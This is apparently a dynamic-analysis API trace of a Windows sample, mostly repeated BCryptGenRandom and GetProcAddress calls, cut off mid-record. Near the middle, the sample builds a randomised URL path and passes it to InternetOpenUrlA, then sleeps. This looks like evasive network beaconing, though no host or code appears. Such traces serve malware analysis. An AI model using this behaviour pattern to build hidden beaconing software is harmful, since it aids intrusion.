0x7ffc5bcc36b0 [0271.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02cd8, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a02cd8) returned 0x0 [0271.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0271.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.885] GetProcessHeap () returned 0x440000 [0271.885] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0271.885] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0271.885] lstrcatA (in: lpString1="\x04", lpString2="/7gck7fgrlJ55u2n9ySdherwge8hg12/GO1j0qtqmj4J5asxeldhphqp0tdTyypk4c3/ki9s5vtzd2hkfqiluXCdrzuHbvnk/qT9htcxrbhfzcKXcx3ca4wtponX57xiy0b2unB/ltSRb4X3pMw9a8w8tx2yrYl2fAnnwb9/" | out: lpString1="\x04/7gck7fgrlJ55u2n9ySdherwge8hg12/GO1j0qtqmj4J5asxeldhphqp0tdTyypk4c3/ki9s5vtzd2hkfqiluXCdrzuHbvnk/qT9htcxrbhfzcKXcx3ca4wtponX57xiy0b2unB/ltSRb4X3pMw9a8w8tx2yrYl2fAnnwb9/") returned="\x04/7gck7fgrlJ55u2n9ySdherwge8hg12/GO1j0qtqmj4J5asxeldhphqp0tdTyypk4c3/ki9s5vtzd2hkfqiluXCdrzuHbvnk/qT9htcxrbhfzcKXcx3ca4wtponX57xiy0b2unB/ltSRb4X3pMw9a8w8tx2yrYl2fAnnwb9/" [0271.885] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0271.885] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/7gck7fgrlJ55u2n9ySdherwge8hg12/GO1j0qtqmj4J5asxeldhphqp0tdTyypk4c3/ki9s5vtzd2hkfqiluXCdrzuHbvnk/qT9htcxrbhfzcKXcx3ca4wtponX57xiy0b2unB/ltSRb4X3pMw9a8w8tx2yrYl2fAnnwb9/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0271.885] GetProcessHeap () returned 0x440000 [0271.885] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0271.885] GetProcessHeap () returned 0x440000 [0271.885] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02c50 | out: hHeap=0x440000) returned 1 [0271.886] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0271.886] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0271.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0271.887] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0271.887] Sleep (dwMilliseconds=0x19067) [0272.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0272.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.044] GetProcessHeap () returned 0x440000 [0272.044] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b2c0 [0272.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2c1, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a1b2c1) returned 0x0 [0272.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 